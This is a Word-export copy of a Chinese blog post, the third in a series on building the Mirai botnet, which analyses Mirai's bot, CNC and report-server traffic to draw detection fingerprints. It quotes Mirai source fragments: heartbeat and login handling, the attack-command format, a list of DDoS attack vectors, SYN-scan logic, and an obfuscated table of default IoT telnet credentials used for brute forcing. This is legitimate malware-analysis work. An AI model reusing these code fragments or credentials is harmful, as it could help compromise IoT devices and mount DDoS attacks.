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34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B34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8"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850B34"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  <w:t>Build Mirai botnet (III): Traffic and Fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B34">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150"/>
        <w:jc w:val="right"/>
        <w:outlineLvl w:val="0"/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</w:pPr>
      <w:r w:rsidRPr="00850B34">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="777777"/>
          <w:kern w:val="36"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>[Research]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B34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B34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2016-11-10 22:32:51</w:t>
      </w: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850B34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cdxy</w:t>
      </w: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850B34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Mirai,botnet,malware,DoS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前两篇文章介绍了Mirai Botnet环境搭配、源码编译及修正、使用说明等。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5" w:history="1">
        <w:r w:rsidRPr="00850B34">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="337AB7"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Build Mirai botnet (I): Compile Mirai Source</w:t>
        </w:r>
      </w:hyperlink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6" w:history="1">
        <w:r w:rsidRPr="00850B34">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="337AB7"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Build Mirai botnet (II): Bruteforce and DDoS Attack</w:t>
        </w:r>
      </w:hyperlink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本篇从流量和源码两个方面分析并提取Mirai各组件指纹。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Bot上线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2326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\x00\x00\x00\x01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ack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\x00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ack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进行三次握手之后，发送两次telnet数据，返回ack：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11125200" cy="4373880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="图片 7" descr="connect-c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-c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源码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上线包分为三个部分，其中首次连接时</w:t>
      </w:r>
      <w:r w:rsidRPr="00850B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id_len==0</w:t>
      </w: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，实际只发送两个telnet包。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main.c line 263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send(fd_serv, "\x00\x00\x00\x01", 4, MSG_NOSIGNAL);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send(fd_serv, &amp;id_len, sizeof (id_len), MSG_NOSIGNAL); // id_len is 0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(id_len &gt; 0)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send(fd_serv, id_buf, id_len, MSG_NOSIGNAL);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Bot心跳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B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t>特征：间隔时间60s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1358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/x00/x00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/x00/x00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ack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在未收到cnc的指令时，bot默认每隔60秒与cnc沟通一次。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1148060" cy="4533900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="heartb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rtbe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0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源码中进行select操作之前等待10秒，如果select结果为0，则按6次的循环周期发送心跳包。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main.c line 193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timeo.tv_usec = 0;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timeo.tv_sec = 10; // wait 10 seconds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nfds = select(mfd + 1, &amp;fdsetrd, &amp;fdsetwr, NULL, &amp;timeo);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(nfds == -1)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#ifdef DEBUG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printf("select() errno = %d\n", errno);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#endif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else if (nfds == 0)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uint16_t len = 0;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(pings++ % 6 == 0) // 60 sec a loop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send(fd_serv, &amp;len, sizeof (len), MSG_NOSIGNAL);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用户登入CNC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这里数据量较大，整体沟通过程如下图所示，我们按图中数据按</w:t>
      </w:r>
      <w:r w:rsidRPr="00850B3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蓝色部分</w:t>
      </w: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分为四快，并逐块分析之。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646420" cy="4373880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5" name="图片 5" descr="user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-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block 1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cnc向bot发送三个telnet包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指纹：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4745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.[?1049h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\xFF\xFB\x01\xFF\xFB\x03\xFF\xFC\x22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data from prompt.txt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第一条数据设置命令行文字输出颜色， 第二条数据设置telnet的行为， 第三条数据是从prompt.txt中读取的用户提示信息(前两篇提到过)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源码分析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admin.go line 20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func (this *Admin) Handle() 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this.conn.Write([]byte("\033[?1049h"))  //set message's color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this.conn.Write([]byte("\xFF\xFB\x01\xFF\xFB\x03\xFF\xFC\x22")) //tell telnet how to print message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defer func() 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this.conn.Write([]byte("\033[?1049l"))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}()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headerb, err := ioutil.ReadFile("prompt.txt")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if err != nil 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header := string(headerb)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this.conn.Write([]byte(strings.Replace(strings.Replace(header, "\r\n", "\n", -1), "\n", "\r\n", -1))) // send prompt data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block 2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提示用户输入用户名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5350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\033[34;1mпользователь\033[33;3m: \033[0m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提示用户登录输入用户名， 然后user逐个字符发送用户名，cnc接收后返回。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admin.go line 37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this.conn.SetDeadline(time.Now().Add(60 * time.Second))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this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m")) //</w:t>
      </w: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输入用户名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username, err := this.ReadLine(false) //</w:t>
      </w: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接受用户输入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err != nil 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block 3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提示用户输入密码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4624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\033[34;1mпароль\033[33;3m: \033[0m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admin.go line 45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this.conn.SetDeadline(time.Now().Add(60 * time.Second))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this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))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password, err := this.ReadLine(true)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if err != nil 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block 4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接下来我们看图中剩余的一大块蓝色部分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4745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\033[37;1mпроверив счета... \033[31m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该数据重复发送多次，只是为了在末尾做出一个“加载中”的动态旋转效果。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this.conn.SetDeadline(time.Now().Add(120 * time.Second))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this.conn.Write([]byte("\r\n"))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spinBuf := []byte{'-', '\\', '|', '/'}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for i := 0; i &lt; 15; i++ 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this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))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time.Sleep(time.Duration(300) * time.Millisecond)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登录成功后的部分提示信息也可作为指纹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3414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[+] DDOS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Wiping env libc.poison.so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block 5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cnc与用户之间的"心跳"，每秒更新一次当前bot的数量。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713220" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="pc-cnc-heartb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-cnc-heartbe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34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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t>特征：每秒发送一次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2084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Bots Connected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admin.go line 95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time.Sleep(time.Second)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_, err := this.conn.Write([]byte(fmt.Sprintf("\033]0;%d Bots Connected | %s\007", BotCount, username))); err != nil {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this.conn.Close()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break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CNC下发攻击指令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这里因为攻击指令很多，情况较复杂，没有固定化的指纹，先看沟通过程。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11155680" cy="4716780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="3" name="图片 3" descr="attack-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tack-comma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56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双方先互换</w:t>
      </w:r>
      <w:r w:rsidRPr="00850B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/x00/x00</w:t>
      </w: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确认，然后cnc向bot发送一条攻击指令。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攻击指令：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按数据的构造顺序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598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长度(Byte)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attack_type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target_num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target_IP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mask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flag_num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total_length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如果target_num和flag_num不为1的话，下面的IP,MASK,FLAG会按格式循环出现，如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[target_num] 02 [IP] 08 08 08 08 [MASK] 20 [IP] 07 07 07 07 [MASK] 20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图中数据对应的攻击指令为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udp 8.8.8.8 1 dport=55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相关源码位置：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attack.go line 318 </w:t>
      </w:r>
      <w:r w:rsidRPr="00850B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func (this *Attack) Build() ([]byte, error)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攻击类型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共支持11种攻击方式（其中8已被取消）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bot/attack.h line 34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#define ATK_VEC_UDP        0  /* Straight up UDP flood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#define ATK_VEC_VSE        1  /* Valve Source Engine query flood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#define ATK_VEC_DNS        2  /* DNS water torture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#define ATK_VEC_SYN        3  /* SYN flood with options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#define ATK_VEC_ACK        4  /* ACK flood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#define ATK_VEC_STOMP      5  /* ACK flood to bypass mitigation devices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#define ATK_VEC_GREIP      6  /* GRE IP flood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#define ATK_VEC_GREETH     7  /* GRE Ethernet flood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//#define ATK_VEC_PROXY      8  /* Proxy knockback connection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#define ATK_VEC_UDP_PLAIN  9  /* Plain UDP flood optimized for speed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#define ATK_VEC_HTTP       10 /* HTTP layer 7 flood */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Bot发起攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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t>特征：存在DoS攻击流量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Bot解析CNC的指令并发起攻击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8831580" cy="5349240"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="2" name="图片 2" descr="udp-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dp-atta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15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Telnet爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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t>特征：存在syn扫描、telnet爆破流量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t感染之后会自动寻找目标进行telnet爆破，其随机生成目标之后，采用tcp-syn-scan方式进行telnet探测，随后使用内置的小字典进行暴力破解，成功之后会将爆破结果发送给report服务器，同时在受害者的主机执行命令，将其感染为bot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Mirai使用一种"改良版"的syn扫描来提高探测速度：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scanner.c</w:t>
      </w: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line 52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(n &lt; sizeof(struct iphdr) + sizeof(struct tcphdr))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(iph-&gt;daddr != LOCAL_ADDR)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(iph-&gt;protocol != IPPROTO_TCP)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(tcph-&gt;source != htons(23) &amp;&amp; tcph-&gt;source != htons(2323))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(tcph-&gt;dest != source_port)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(!tcph-&gt;syn)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(!tcph-&gt;ack)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(tcph-&gt;rst)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(tcph-&gt;fin)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if (htonl(ntohl(tcph-&gt;ack_seq) - 1) != iph-&gt;saddr)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continue;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其内置密码60条，包含常见弱口令及一些物联网设备的默认密码。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源码</w:t>
      </w:r>
      <w:r w:rsidRPr="00850B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scanner.c line 124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// Set up passwords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add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);                     // root     xc3511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add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);                          // root     vizxv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add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);                          // root     admin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add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);                      // admin    admin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add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);                      // root     888888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add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);                  // root     xmhdipc</w:t>
      </w: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50B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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50B34">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>...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这一步的沟通过程：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建立tcp握手之后，仅进行一次登录尝试，然后发送一系列命令判断是否登录成功。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4876800" cy="3665220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="tcp-brute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-brute-cont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指纹: 连续发送以下指令可匹配Bot身份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2689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enable.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system.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shell.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/bin/busybox MIRAI.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其中由于telnet设备各异，大多数请况下Bot发送到第三条指纹就被断开连接。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总结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CNC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心跳（入流量）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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特征：间隔时间60s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1358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/x00/x00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/x00/x00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ack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用户提示（出流量）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5350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\xFF\xFB\x01\xFF\xFB\x03\xFF\xFC\x22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[+] DDOS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Wiping env libc.poison.so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\033[34;1mпользователь\033[33;3m: \033[0m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\033[34;1mпароль\033[33;3m: \033[0m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用户消息推送（出流量）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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t>特征：每秒发送一次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2084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Bots Connected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开放端口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1110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服务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Bot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心跳（出流量）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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t>特征：间隔时间60s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1358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/x00/x00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cnc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/x00/x00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ack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telnet爆破（出流量）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B3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Cs w:val="21"/>
        </w:rPr>
        <w:t>特征：大量、连续发送以下数据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10"/>
        <w:gridCol w:w="2689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enable.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system.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shell.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/bin/busybox MIRAI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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存在syn扫描及DoS流量（出流量）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B34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Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B34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0B3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开放端口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72"/>
        <w:gridCol w:w="1590"/>
      </w:tblGrid>
      <w:tr w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidTr="00850B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服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00850B34" w:rsidRPr="00850B34" w:rsidTr="00850B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48101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B34" w:rsidRPr="00850B34" w:rsidRDefault="00850B34" w:rsidP="00850B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0B34">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tcpwrapped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009E5BCF" w:rsidRDefault="009E5BCF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009E5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2984"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F50E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C3E2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDA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8545A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D2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C52E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF2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26285"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA92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E0644"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FD2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50CCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBF6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3786C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A52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34"/>
    <w:rsid w:val="00850B34"/>
    <w:rsid w:val="009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E374-0DBF-48A6-B088-C34C5B99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0B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0B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B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50B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B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0B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B3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50B3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ost-datetime">
    <w:name w:val="post-datetime"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00850B34"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00850B34"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-user">
    <w:name w:val="post-user"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00850B34"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-tags">
    <w:name w:val="post-tags"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00850B34"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00850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0B3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0B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50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50B3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0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9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67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334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xy.me/?p=74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dxy.me/?p=74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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-22T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-22T10:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>